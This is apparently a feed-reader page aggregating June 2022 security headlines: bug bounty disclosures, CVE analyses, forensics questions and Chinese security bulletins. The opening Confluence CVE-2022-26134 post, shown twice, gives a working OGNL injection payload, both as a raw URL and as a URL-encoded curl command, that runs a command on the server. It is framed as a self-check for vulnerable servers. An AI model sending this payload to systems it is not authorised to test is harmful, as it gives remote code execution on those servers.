    On 2022-06-03, New zero-day Vulnerability occured. CVE-2022-26134 is one of command injection vulnerability. According to Report, a zero-day attack that began during the Memorial Day holiday in the United States and attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see full report on this blog https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches : https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/ If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability. curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response Comments URL: https://news.ycombinator.com/item?id=31677086 Points: 17 # Comments: 6
  • Open

    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(三)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 第二部分:漏洞复现 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二) 本系列第三篇主要对漏洞成因和原理做...
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(二)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 分析完网上流传的样本后,我准备尝试替换cab文件中的文件后复现漏洞。安装的office软件版本:Microsoft Word 2016 (16....
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(一)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg 漏洞概述 2021年9月8日,微软发布安全通告,披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行...
  • Open

    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(三)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/hHlscdLIvO0BY173ksq8vA 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 第二部分:漏洞复现 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(二) 本系列第三篇主要对漏洞成因和原理做...
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(二)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/q0lbegDjLViLI48N6RjGVw 接上文: 第一部分:样本分析 CVE-2021-40444-Microsoft MSHTML远程命令执行漏洞分析(一) 分析完网上流传的样本后,我准备尝试替换cab文件中的文件后复现漏洞。安装的office软件版本:Microsoft Word 2016 (16....
    CVE-2021-40444-Microsoft MSHTML 远程命令执行漏洞分析(一)
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/6q9fbggpkhd4PtwnghvZgg 漏洞概述 2021年9月8日,微软发布安全通告,披露了Microsoft MSHTML远程代码执行漏洞,攻击者可通过制作恶意的ActiveX控件供托管浏览器呈现引擎的 Microsoft Office文档使用,成功诱导用户打开恶意文档后,可在目标系统上以该用户权限执行...
  • Open

    Analysis report of Zero-day Vulnerability in Atlassian Confluence.
    On 2022-06-03, New zero-day Vulnerability occured. CVE-2022-26134 is one of command injection vulnerability. According to Report, a zero-day attack that began during the Memorial Day holiday in the United States and attacker could exploit this CVE-2022-26134 vulnerability to upload a webshell. You can see full report on this blog https://blog.criminalip.io/2022/06/05/criminal-ip-analysis-report-on-zero-day-vulnerability-in-atlassian-confluence/ . ​ https://preview.redd.it/uvzj6bb2ai491.png?width=933&format=png&auto=webp&s=1e4e10b5a3e71515abdc1d3de3dd2e5b0e7ed3d7 EDIT: Patch out: https://www.atlassian.com/software/confluence/download-archives If you are a Confluence user and you have access to Confluence through a browser on your PC, you can run the following command with a curl or python script to determine vulnerabilities of your Confluence server. Even if you are not an information security officer, there is a way to check vulnerabilities of your company’s Confluence. Try the following method and immediately request your security department for patches : https://your_confluence_address/${(#result=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“id”).getInputStream(),”utf-8″)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#result))}/ If you change the part of your Confluence address, you can check it with curl as follows. If the uid, gid, and group of the Confluence server are displayed in the X-Cmd-Response header value, this server is considered to have CVE-2022-26134 vulnerability. curl -v -k –head https://your_confluence_address/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ | grep X-Cmd-Response submitted by /u/Late_Ice_9288 [link] [comments]

  • Open

    Active directory scripts for setting a lab?
    Are there any good resources or scripts etc... to build your own AD server to do some labs on? submitted by /u/networkalchemy [link] [comments]
    IAST that works with AWS Fargate and Lambda
    Hey everyone Does anyone have any recommendations for the IAST tool that may work with Fargate and Lambda? I've run a few DAST trials and none of them seems to work well with React.js SPAs. (Tannable, Probely, Detectify, etc) We have EKS(Fargate) for the customer-facing app and many smaller Lambda services with API Gateway. submitted by /u/greyeye77 [link] [comments]
  • Open

    Mostly newer US & UK movies & TV; some classics & grindhouse sprinkled in
    http://vod.simpletv.eu/media/storage/ submitted by /u/acidwashvideo [link] [comments]
  • Open

    Exploiting Amazon active vulnerability
    How to exploit an Amazon active vulnerability and get access to Prime (& all it’s benefits, including all Prime Video Channels) for FREE!… Continue reading on Medium »
    Setting Up Burp Suite
    Day 0: Recon Continue reading on Medium »
    Intigriti — XSS Challenge — May 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc I’m tired of everything. Continue reading on Medium »
    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
    What Is Bug Bounty — How To Make Money As A Hacker — NM Tech blog — Sharing Tech Knowledge
    1) What is Bug Bounty Continue reading on Medium »
    Don’t get caught in the viewer list of any user story of Instagram
    Hi Continue reading on Medium »
    Announcing Qilin V2 Mainnet Bug Bounty Program on Immunefi
    Following our V2 mainnet launch on April 21st, Qilin will initiate a new round of its long-term Bug Bounty Program with a total reward of… Continue reading on Medium »
  • Open

    what is your preferred tool to capture websites?
    Seeking info regarding what tools you have used to capture website pages for investigation purposes. submitted by /u/ATXChimera [link] [comments]
    EnCase 20.2 not detecting local storage or removable media on Add Evidence menu
    Ok n00b question here, having an issue with EnCase 20.2. I just tried reinstalling for the 3rd time now, and I cannot for the life of me figure out why it won't detect my local storage HDD or a USB stick. I can see both in Fast Block SE but when I attempt to locate[add] either as evidence, nothing happens, even after unchecking or leaving the default options to add a local device. Not sure what's going on. https://preview.redd.it/ypfeszyamf491.jpg?width=1920&format=pjpg&auto=webp&s=7ca169e1544ab0bf5e2ac8bcbf612022173a38fe submitted by /u/Termin4lyIns4neLabs [link] [comments]
    Should I be able to create an AXIOM portable case that allows the user to view the file system?
    Just noticed that the file system view is grayed out in the portable case I made, not sure if I missed an option or if it's an inherent limitation with a portable case. submitted by /u/Expensive_Ad6442 [link] [comments]
  • Open

    Several Subdomains Takeover
    Reddit disclosed a bug submitted by 3amii: https://hackerone.com/reports/1591085
    XSS by clicking Jira's link
    GitLab disclosed a bug submitted by ooooooo_q: https://hackerone.com/reports/1194254 - Bounty: $1130
    Gitlab Pages token theft using service workers
    GitLab disclosed a bug submitted by ehhthing: https://hackerone.com/reports/1439552 - Bounty: $1680
    "External status checks" can be accepted by users below developer access if the user is either author or assignee of the target merge request
    GitLab disclosed a bug submitted by joaxcar: https://hackerone.com/reports/1375393 - Bounty: $610
    Stored XSS on issue comments and other pages which contain notes
    GitLab disclosed a bug submitted by jarij: https://hackerone.com/reports/1398305 - Bounty: $3000
    Reflected XSS on https://www.glassdoor.com/parts/header.htm
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1073712 - Bounty: $600
    Reflected XSS on https://help.glassdoor.com/gd_requestsubmitpage
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1094224 - Bounty: $500
    Open redirect on https://www.glassdoor.com/profile/siwa.htm via state parameter
    Glassdoor disclosed a bug submitted by 0x7: https://hackerone.com/reports/1097208 - Bounty: $100
  • Open

    New Technique: Extracting Clear-Text Credentials Directly From Chromium’s Memory
    submitted by /u/jat0369 [link] [comments]
    Using Windows Event Log IDs for Threat Hunting
    submitted by /u/sciencestudent99 [link] [comments]
    People’s Republic of China State-Sponsored Actors Exploit Network Providers and Devices
    submitted by /u/ksr_malware [link] [comments]
    CVE-2022-30287 - Remote Code Execution via Email in Horde Webmail
    submitted by /u/monoimpact [link] [comments]
    Confluence Webshells being dropped into the honeypot
    submitted by /u/Mr-R3b00t [link] [comments]
  • Open

    【安全通报】泛微 E-Office 文件包含漏洞(CNVD-2022-43247...
    近日,CNVD 官方发布了泛微 E-Office 文件包含漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新...
    【安全通报】泛微 E-Office SQL注入漏洞(CNVD-2022-43246...
    近日,CNVD 官方发布了泛微 E-Office SQL注入漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新。...
  • Open

    【安全通报】泛微 E-Office 文件包含漏洞(CNVD-2022-43247...
    近日,CNVD 官方发布了泛微 E-Office 文件包含漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新...
    【安全通报】泛微 E-Office SQL注入漏洞(CNVD-2022-43246...
    近日,CNVD 官方发布了泛微 E-Office SQL注入漏洞,泛微网络官方已发布修复补丁,请广大用户及时下载更新。...
  • Open

    Vulnerability Management in 4 Stages
    Article URL: https://ross-sec-audio.github.io//posts/Vulnerability-Management-in-4-Stages/ Comments URL: https://news.ycombinator.com/item?id=31671924 Points: 1 # Comments: 1
    Risk, Threat, or Vulnerability? What's the Difference
    Article URL: https://www.kennasecurity.com/blog/risk-vs-threat-vs-vulnerability/ Comments URL: https://news.ycombinator.com/item?id=31667578 Points: 1 # Comments: 0
    Updates for GKE Authorized Networks After Vulnerability Rewards Program Report
    Article URL: https://cloud.google.com/blog/products/identity-security/updates-coming-for-authorized-networks-and-cloud-runfunctions-on-gke Comments URL: https://news.ycombinator.com/item?id=31662195 Points: 1 # Comments: 0
  • Open

    My #Rightscon2022 keynote address at the Human Rights Journalists Network panel session on Media…
    Whether in Nigeria or somewhere in USA, citizens, and journalists are investigating and documenting human rights abuses. Darnella Fraizer… Continue reading on Medium »
    War in Ukraine / June 7
    The difficult process of postwar reconstruction Continue reading on Medium »
    Image Analysis -Osint Tools
    What is Image Analysis??? Continue reading on Medium »
    Gathering JUICY info from Instagram
    Hey hi everyone, I’m back with another interesting blog. In this blog I will show you how you can get private information of any Instagram… Continue reading on Medium »
  • Open

    SecWiki News 2022-06-08 Review
    浅谈设备指纹技术和应用 by ourren 溯源反制案例分享(二) by ourren SQL脚本自动化审核工具(MYSQL) by ourren 2022云原生安全技术峰会议题Slide by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-08 Review
    浅谈设备指纹技术和应用 by ourren 溯源反制案例分享(二) by ourren SQL脚本自动化审核工具(MYSQL) by ourren 2022云原生安全技术峰会议题Slide by ourren 更多最新文章,请访问SecWiki
  • Open

    [BugBounty] Tips to Find Stored XSS
    Intro Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    Detecting DNS Tunneling using Spark Structured Streaming
    From generating DNS logs to end-to-end implementation of structured streaming Continue reading on InfoSec Write-ups »
  • Open

    企业抵御网络风险 应关注安全平台 | 直击RSAC2022
    随着组织机构在高度互联的数字生态系统中不断深入,如何应对来自四面八方的网络攻击是每一个首席信息安全官们不得不面对的难题。
    FreeBuf | 欧盟强制苹果等设备使用type C接口;信通院发布《软件物料清单实践指南》
    欧洲议会已就拟议的立法达成协议,将强制所有未来的智能手机,包括苹果的iPhone使用通用的USB-C端口进行充电。
    网络资产攻击面管理(CAASM)成安全新解法 | 直击RSAC2022
    如何通过CAASM帮助企业全面盘点网络资产,不断提高资产可见性和云配置,减少安全漏洞风险成为RSAC2022的焦点之一。
    黑客团伙又增“一员”,AI 黑客或很快登场 | 直击RSAC2022
    网络界“奥斯卡”之称的RSAC 2022一直延迟到六月才得举办。今年,施奈尔对于人工智能黑客攻击又有什么新的观点?
    在恶意软件、供应链攻击呈上升趋势下,企业需重新考虑安全策略 | 直击RSAC2022
    作为全球网络安全行业一年一度的盛宴,RSA Conference 2022于6月6-9日正在美国旧金山召开。
    谷歌因侵犯隐私向居民赔偿1 亿美元
    谷歌相册在未经充分的事先通知和同意的情况下,将照片中出现的相似人脸进行分组归类。
  • Open

    Hiding Your Covenant Grunts
    submitted by /u/Diesl [link] [comments]

  • Open

    Ebooks covering chemistry, military, logistics etc
    https://ftp.idu.ac.id/wp-content/uploads/ebook/ submitted by /u/c-rn [link] [comments]
  • Open

    [Windows] Hidden Bind Shell
    Olá! Hoje vou lhe apresentar uma técnica muito interessante de Bind Shell, vamos nos esconder de outros hosts… Continue reading on Medium »
    HackTheBox — Paper [Write-up]
    Today I would like to change the pace and try some Easy challenges from HackTheBox. I picked Paper which is a The Office-themed machine… Continue reading on Medium »
    The Prince0f4llSaiyanz
    Hello and thanks to everyone who took the time to click here and read. My name is Xavier, known a few places as TheMadHatter or… Continue reading on Medium »
  • Open

    Question about hands on practice
    I'm gonna apologize in advance for my noobish question, but could you theoretically build an insecure piece of software or application (telegram like messenger for example) and practice exploitation locally (RCE potentially?) or is there more to it such as os level defense mechanisms that would prevent that? submitted by /u/WarmToiletSeat0 [link] [comments]
  • Open

    DogWalk 0-day vulnerability in Microsoft's Diagnostic Tool
    submitted by /u/CyberMasterV [link] [comments]
    AWS S3 Scanner: Online tool for finding misconfigurations
    submitted by /u/virtue-elliott [link] [comments]
    Network analysis of a targeted phish that got past Defender
    submitted by /u/tmpXXXXXX [link] [comments]
    Open source automated NIST SP 800-53 r5 benchmark for AWS (120+ controls!)
    submitted by /u/bobtbot [link] [comments]
    CVE-2022–29622: (In)vulnerability Analysis
    submitted by /u/JohnKeymanUK [link] [comments]
    Multiple vulnerabilities in Zyxel zysh
    submitted by /u/0xdea [link] [comments]
    Scanning statistics of vulnerable Atlassian Confluence Server(CVE-2022-26134) : Still lots of servers are exposed to the internet.
    submitted by /u/Late_Ice_9288 [link] [comments]
    Building Safe End-to-End Encrypted Services for Business - a Google Workspace perspective
    submitted by /u/ebursztein [link] [comments]
    Observed In The Wild: Atlassian Confluence Server CVE-2022-26134
    submitted by /u/netsecfriends [link] [comments]
  • Open

    How to get into Cyber Security in 2022
    Hello there! I hope you all are well and doing great in your life. Continue reading on Medium »
    Intigriti — XSS Challenge — April 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. So let’s start talking rn bc this writeup will be long. Continue reading on Medium »
    Find 3 bugs in Similarweb.com which din’t pay
    Hi Folks i have find 3 bugs in similarweb which didn’t paid and din’t thanks thank check it out. Continue reading on Medium »
    How smartlook take bug and didn’t paid as they said we will’’ & Also Have Bug Bounty Programme!
    Stored-XSS Admin Takeover From Low User app.smartlook.com Continue reading on Medium »
    Intigriti — XSS Challenge — March 2022 — Bug Bounty Hunting — Writeup
    Hello guys I am back again. This challenge was pretty interesting and one of my fav. Let’s start talking instead of wasting our time. Continue reading on Medium »
    Aurora Inflation Spend Bugfix Review: $6m Payout
    Summary Continue reading on Immunefi »
    . Eu tenho um apelido que você não vai gostar.
    Olá meus amigos, como vocês estão? espero que estejam bem. Continue reading on Medium »
    An unusual way to find XSS injection in one minute
    Hi there! I think that many developers have heard that you can’t trust any user input, and indeed it is. However, there are some places… Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    Disclosing an unfixed Google Cloud Platform vulnerability post 90-day deadline
    Article URL: https://twitter.com/itspeterc/status/1534205155914264576 Comments URL: https://news.ycombinator.com/item?id=31659573 Points: 2 # Comments: 0
    Microsoft wont say if it will patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31658744 Points: 1 # Comments: 0
    Microsoft won’t say if it'll patch critical Windows vulnerability under exploit
    Article URL: https://arstechnica.com/information-technology/2022/06/microsoft-wont-say-if-it-will-patch-critical-windows-vulnerability-under-exploit/ Comments URL: https://news.ycombinator.com/item?id=31652144 Points: 2 # Comments: 1
  • Open

    War in Ukraine / June 6
    Ukraine does not expect an attack from Belarus Continue reading on Medium »
    Top OSINT tools: find sensitive public information before hackers
    Top OSINT tools: find sensitive public information before hackers Continue reading on Medium »
    Bringing back sensitive files from web archives
    Technical details Continue reading on Medium »
  • Open

    SecWiki News 2022-06-07 Review
    工业控制系统安全综述 by ourren ​C-V2X安全研究 by ourren SecWiki周刊(第431期) by ourren OT环境下IoT安全的破局探索 by h4ck01 滥用隐藏属性来攻击 Node.js 生态系统 by ourren 使用LATCH来阻止npm生态的安装时攻击 by ourren 云上典型挖矿团伙浮沉 by Avenger 星链的军事化应用 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-07 Review
    工业控制系统安全综述 by ourren ​C-V2X安全研究 by ourren SecWiki周刊(第431期) by ourren OT环境下IoT安全的破局探索 by h4ck01 滥用隐藏属性来攻击 Node.js 生态系统 by ourren 使用LATCH来阻止npm生态的安装时攻击 by ourren 云上典型挖矿团伙浮沉 by Avenger 星链的军事化应用 by ourren 更多最新文章,请访问SecWiki
  • Open

    Tip on working with E01 images of a Linux system -> accessing an LVM partition (Tsurugi Linux as a forensic workstation)
    submitted by /u/DFIRScience [link] [comments]
    Memory forensics analysis with Volatility | HackTheBox Export | Intro to Blue Team.
    submitted by /u/MotasemHa [link] [comments]
  • Open

    Path traversal, to RCE
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/733072 - Bounty: $12000
    Steal private objects of other projects via project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/743953 - Bounty: $20000
    Private objects exposed through project import
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/767770 - Bounty: $20000
    Path traversal in Nuget Package Registry
    GitLab disclosed a bug submitted by saltyyolk: https://hackerone.com/reports/822262 - Bounty: $12000
    Store Admin Page Accessible Without Authentication at http://www.grouplogic.com/ADMIN/store/index.cfm
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164854 - Bounty: $250
    Stored Cross Site Scripting at http://www.grouplogic.com/ADMIN/store/index.cfm?fa=disprocode
    Acronis disclosed a bug submitted by ub3rsick: https://hackerone.com/reports/1164853
  • Open

    Atlassian Confluence Server CVE-2022-26134 being actively expoited in the wild
    Article URL: https://www.greynoise.io/blog/observed-in-the-wild-atlassian-confluence-server-cve-2022-26134 Comments URL: https://news.ycombinator.com/item?id=31652889 Points: 14 # Comments: 6
  • Open

    FreeBuf早报 | 意大利巴勒莫市因网络攻击断网;Facebook首次任命CISO
    受遭遇网络攻击的影响,拥有130万人口的巴勒莫市被迫关闭了所有系统,对与市民和游客息息相关的广泛运营服务都产生了巨大影响。
    多年终端安全沉淀,源自支付宝的全链路安全防护建设 | 6月24日19点公开课
    6月24日(周五)晚上19:00,不见不散。
    关键词“转型”,Talon斩获创新沙盒大赛冠军 | 直击RSAC2022
    初创企业Talon Cyber Security公司力克群雄,成功拿下创新沙盒大赛冠军,成为了网络安全行业眼中的“明日之星”。
    云攻击面管理已成大势所趋 | 直击RSAC2022
    云攻击面管理早已成为整个企业安全不可或缺的一部分。
    意大利某市欲关闭系统以抵抗网络攻击
    意大利南部巴勒莫市遭受网络攻击,这给城市的运营、市民以及游客带来了巨大影响。
    记一次水平越权漏洞的利用
    记录了一次水平越权的全过程。
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Pandora from HackTheBox — Detailed Walkthrough
    No content preview
    Spring4Shell (SpringShell) Vulnerability
    No content preview
    VLAN Hopping Attack
    No content preview
    NoSQL Injection
    No content preview
    Hacking Nginx: Best ways
    No content preview
    Capture the Ether — Challenge Writeup
    I started concentrating in smart contract security and it is really interesting. Continue reading on InfoSec Write-ups »
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    CVE-2022-30190 MSDT 代码注入漏洞分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年6月7日 English version: https://paper.seebug.org/1914/ 分析一下最近Microsoft Office 相关的 MSDT 漏洞。 1. WTP 框架 文档:https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Analysis of MSDT Code Injection Vulnerability(CVE-2022-30190)
    Author: HuanGMz@Knownsec 404 Team Chinese version: https://paper.seebug.org/1913/ 1. WTP doc:https://docs.microsoft.com/en-us/previous-versions/windows/desktop/wintt/windows-troubleshooting-toolkit...
    CVE-2022-30190 MSDT 代码注入漏洞分析
    作者:HuanGMz@知道创宇404实验室 时间:2022年6月7日 English version: https://paper.seebug.org/1914/ 分析一下最近Microsoft Office 相关的 MSDT 漏洞。 1. WTP 框架 文档:https://docs.microsoft.com/en-us/previous-versions/windows/desk...
  • Open

    Best tool to clone NFC tags from a distance?
    I currently have the ProxMark3 but I need to get the NFC tag really close. Is there any modifications I can do? If not, what product would you recommend? submitted by /u/ErikDz11 [link] [comments]

  • Open

    Misconfigurated login page able to lock login action for any account without user interaction
    Reddit disclosed a bug submitted by h1ugroon: https://hackerone.com/reports/1582778
    2 Cache Poisoning Attack Methods Affect Core Functionality www.exodus.com
    Exodus disclosed a bug submitted by bismillahfortuner: https://hackerone.com/reports/1581454
    Registered users contact information disclosure on salesforce lightning endpoint https://disposal.gsa.gov
    U.S. General Services Administration disclosed a bug submitted by rptl: https://hackerone.com/reports/1443654
  • Open

    You too can be a neuroscientist. Videos.
    Duke Univ. https://histology.oit.duke.edu/MBS/Videos/Neuro/ submitted by /u/inoculatemedia [link] [comments]
    [NSFW] Two nude photo directories that I found
    I did try to do a search to see if these links have come up before, and I didn't find anything. If they, in fact, did, then that's my bad. https://www.iammoon.com/helpers/boobs/ http://zascar.com/files/gifs/boobies/ submitted by /u/VerifiedNSFWThrowawa [link] [comments]
    HTTrack capturing the wrong link when I use the "Capture URL" feature?
    So I'm trying to download webpages from my Canvas portal (Learning Management System that has history of all my grades, assignments, etc.) from my viewpoint logged in for personal record. It uses two-factor authentication so I have to use the "Capture URL" feature. When I enter the provided proxy info into the browser and go the webpage, instead of capturing the main page it keeps capturing a different link. Instead of http://[myuniversity].instructure.com/ it's captures the URL as http://oscp.piki.googl/ with a string of numbers following it. I was wondering what could be going wrong here and how to fix it? I'm using the GUI Windows version of HTTrack. submitted by /u/beyondtheleaves [link] [comments]
  • Open

    Intigriti — XSS Challenge — February 2022  — Bug Bounty Hunting — Writeup
    Hello guys I am back. This challenge was awesome btw. So let’s start talking. Continue reading on Medium »
    Intigriti — XSS Challenge — January 2022 — Writeup
    Hello guys I am back. I was bored so I decided to post some Intigriti’s writeups until new XSS challenge comes now at June 20. So let’s… Continue reading on Medium »
    How I gave rest to company’s email updates service
    Hello everyone, hope you all are doing well Continue reading on Medium »
    Wgel Walkthrough
    Welcome back, folks!! Today presenting one more boot to root kind of box from TryHackMe. It is a beginner-level box with some cool… Continue reading on Medium »
    Hacking Nginx: Best ways
    Nginx is being used in the wild since a while now. We all have seen NGINX name somewhere while coding/hacking. NGINX has always been a… Continue reading on InfoSec Write-ups »
    What I learnt from reading 126* Information Disclosure Writeups.
    Let’s tackle the most valuable and mysterious bug type… Continue reading on Medium »
    AlbusSec:- Penetration-List 07 Cross-Side-Request-Forgery(CSRF) — Sample-2
    Hi Information Security folk, I hope you are well and doing great in your life, Before we go to the next step, You’ll need to learn about… Continue reading on Medium »
    My Pentest Log -21 — (Content-Type Checks)
    Greetings everyone from Porta Platea, Continue reading on Medium »
  • Open

    Shining the Light on Black Basta - documents some of the TTPs employed by a threat actor group who were observed deploying Black Basta ransomware
    submitted by /u/digicat [link] [comments]
    Passwordstate - Revoked its Digicert certificate used to sign the code
    submitted by /u/_r3l0ad3d [link] [comments]
    ESP-IDF Setup Guide - A guide on setting up an environment for ESP32 vulnerability research
    submitted by /u/Gallus [link] [comments]
  • Open

    Microsoft Follina Vulnerability in Windows Can Be Exploited Through Office 365
    Article URL: https://www.wired.com/story/microsoft-follina-vulnerability-windows-office-365/ Comments URL: https://news.ycombinator.com/item?id=31643486 Points: 1 # Comments: 0
    ESP-IDF Setup Guide – Setting up an environment for ESP32 vulnerability research
    Article URL: https://www.elttam.com/blog/esp-idf-setup-guide/ Comments URL: https://news.ycombinator.com/item?id=31637749 Points: 2 # Comments: 0
  • Open

    War in Ukraine / June 3–5
    Ukraine is facing a shortage of everything Continue reading on Medium »
    Ministry of Public Security — Chinese Cyber Espionage Over 19 Million People
    Continue reading on Medium »
    Use of Web Archive In OSINT Investigation ! Go back to past
    Using web archives allows you to see what a web page or site looked like in the past ! Continue reading on Medium »
  • Open

    Can Video Signal Adaptors (eg: displayport to HDMI) compromise your system?
    title. I'm aware how USB devices can compromise your system, and generally try to avoid hardware made from dubious countries (cheap GPUs from China anyone?) I'm in a bit of a pickle over video signal adaptors though. Where I'm from, practically all of these adaptors are manufactured in China. It also seems that some of them do active encoding/decoding between the various video signal types (VGA, HDMI, Displayport). From a purely technical perspective, can these adaptors compromise a system? Edit: Found this - https://www.ehacking.net/2016/07/exploring-vulnerabilities-in-hdmi.html submitted by /u/tappervogine [link] [comments]
    RIPE IP addresses
    This is a crazy question I have a coworker who is convinced that all RIPE IP addresses cary a higher risk than say ARIN or other internet registries? I have a lot of respect for this person but I think this is an incorrect assumption? Thoughts? Thanks submitted by /u/DCbasementhacker [link] [comments]
  • Open

    SecWiki News 2022-06-06 Review
    CVE-2022-30190漏洞的学习一 by 嘿嘿哈哈 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-06-06 Review
    CVE-2022-30190漏洞的学习一 by 嘿嘿哈哈 更多最新文章,请访问SecWiki
  • Open

    What's everyone using for remote memory acquisition?
    Hello. I say "remote" because most of our laptops are users WFH. What's everyone using to capture a memory image then acquire on remote workstation or server? submitted by /u/antmar9041 [link] [comments]
    What will it take to change the carrier path?
    Hi, everyone! The question is more out of curiosity... I've been in IT industry for about 6 years now. Mainly working as a sys admin. I recently was promoted to cyber security analyst and started taking classes to suit my new position. One of my classes is digital forensic analysis and I have always been fascinated by this field. Not like I am unhappy in my new role and I definitely want to stay in these shoes for some time to build up my experience and knowledge and work on my portfolio. But I am wondering what and where should I start if I will decide to go toward digital forensics? ​ Thank you! submitted by /u/Austronaut1403 [link] [comments]
    Will the Real Msiexec Please Stand Up? Exploit Leads to Data Exfiltration
    🔥 New report out from TheDFIRReport crew! ​ - ManageEngine SupportCenter Plus exploited - LSASS dump from web shell - Plink / RDP / Exfiltration ​ Enjoy! ​ https://t.co/J0Kpho5VU7 submitted by /u/samaritan_o [link] [comments]
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    Pen #005: Linux Basics (Part 2)
    No content preview
  • Open

    CVE-2022-26134 Confluence OGNL RCE 漏洞深入分析和高版本绕过沙箱实现命令回显
    作者:且听安全 原文链接:https://mp.weixin.qq.com/s/nCMtSD7QH8ai6fpurJBXTg 漏洞信息 最近 Confluence 官方通报了一个严重漏洞 CVE-2022-26134 : 从漏洞描述来看,这仍然是一个 OGNL 表达式注入漏洞。影响版本如下: from 1.3.0 before 7.4.17 from 7.13.0 before 7.13...
    Follina Microsoft Office RCE with MS-MSDT Protoco
